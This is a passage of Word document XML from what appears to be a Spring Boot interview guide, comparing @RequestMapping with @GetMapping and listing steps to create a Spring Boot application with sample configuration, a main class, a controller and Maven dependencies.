          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75530A47"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neral-purpose (supports all HTTP methods)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DBE488C"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ecifically for HTTP GET requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4874A023" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7384B53D"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Introduced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4529E25E"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troduced in early versions of Spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72DDF7B4"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troduced in Spring 4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5057DB89" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D304059"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Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F2163CE"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Flexible, can handle any HTTP method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EFECEFF"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ecialized for GET requests only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4A57BA6D" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="558DFADF"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age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42DE30A0"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quires explicit method attribute if you want to restrict the HTTP method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60FC4E61"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No need for method specification, automatically for GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2297C39D" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338139C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@RequestMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need a more flexible approach that can handle multiple HTTP methods in the same method or need finer control over the request handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09551CA5" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00CE4B95" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@GetMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for simplicity and clarity when handling HTTP GET requests. It is a more concise and readable alternative to @RequestMapping(method = RequestMethod.GET).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DEC56D" w14:textId="028AE33C"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C675092">
          <v:rect id="_x0000_i2599" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626640D" w14:textId="12AD2E2F" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="610" w:name="_Toc196308090"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have to create a Spring boot application? What steps will you follow</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="610"/>
    </w:p>
    <w:p w14:paraId="65C1B16F" w14:textId="22C2F613" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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o create a Spring Boot application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0D97F" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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Set up the Development Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64C5BC"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Install JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure you have Java Development Kit (JDK) installed (preferably JDK 11 or later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402AD03"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Install an IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use an IDE like IntelliJ IDEA, Eclipse, or Visual Studio Code for development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B445A0"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Install Maven/Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot supports both Maven and Gradle for dependency management. Make sure you have one of them installed if not using the built-in IDE support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFD695" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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Create the Spring Boot Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937C23C"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create a Spring Boot application in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2342CE"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ing Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Online tool or directly in your IDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6857E" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="002C6305">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Spring Initializr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC1680" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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hoose the following options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F823A4" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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roject: Maven or Gradle (typically Maven)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7BF6DD" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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anguage: Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA3D2B" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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 Boot version: Choose the latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC9A65C" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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roject Metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F000E7C" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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roup: com.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103876A7" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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rtifact: springbootapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CA2B5" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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Name: springbootapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AE2E2" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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ackaging: Jar (or War if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078EA583" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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Java Version: Choose the version compatible with your JDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067048EB" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Dependencies: Select appropriate dependencies (e.g., Spring Web, Spring Data JPA, Thymeleaf, Spring Security, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAA06F0" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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Click </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it will download a zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D8D511" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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tract the zip and open it in your IDE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672C9A3"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ing IDE (IntelliJ IDEA or Eclipse)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE5199" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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 IntelliJ, you can directly create a Spring Boot project by selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when creating a new project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D3D2F" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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 Eclipse, use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Tool Suite (STS)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a Spring Boot project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA135C7" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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Configure application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C98D6F3"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e your application-specific properties like database connection, logging, server settings, etc., in src/main/resources/application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B294E"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 (application.properties):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC6716"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port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B70FD"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rl=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A6403"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sername=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548BB994"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password=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B5196"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55B3C5" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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4. Create the Main Application Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE62F6"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 Boot applications have a main class with the @SpringBootApplication annotation, which is the entry point for the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D873B67"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07FEB590"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ackage com.example.springbootapp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188124E" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C330EA1"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boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC51D96"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boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0D014D" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F7998D"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA8100"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SpringbootappApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3C17B"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E2557E"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pringApplication.run(SpringbootappApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF67308"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5A7AC7C"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7C90DBD2" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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lastRenderedPageBreak/>
        <w:t>5. Create Controllers, Services, and Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E1221"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ontroller</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Define the web layer, e.g., REST controllers or Thymeleaf controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A6C28"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ervice</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Business logic layer (optional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B41127"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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Data access layer (e.g., Spring Data JPA repositories).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102B7BE"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 Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FE52B"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ackage com.example.springbootapp.controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641760E2" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FECBC21"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA2BC2"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D8F5E" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D21AD1E"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFB1292"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HelloController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E042722"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tMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E10C1"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ring hello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B587F2"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Hello, Spring Boot!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662CFB7F"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66B913E5"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53D3372" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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6. Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB94E5"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Depending on your project needs, add the required dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC1865"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ring Web</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building REST APIs or MVC applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02009045"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ring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for database interactions using JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB55AB"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Thymeleaf</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building server-side HTML templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A028093"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ring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for securing the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B771E"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Lombok</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reducing boilerplate code (optional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5B36F"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 Maven dependencies in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562174A0"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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C840D04"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F44C10"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716D415"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spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D31467"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C2870A"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C35962"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48DAC5"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spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD8D10"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52195BF4"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E981DF"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662826DE"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spring-boot-starter-thymeleaf&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
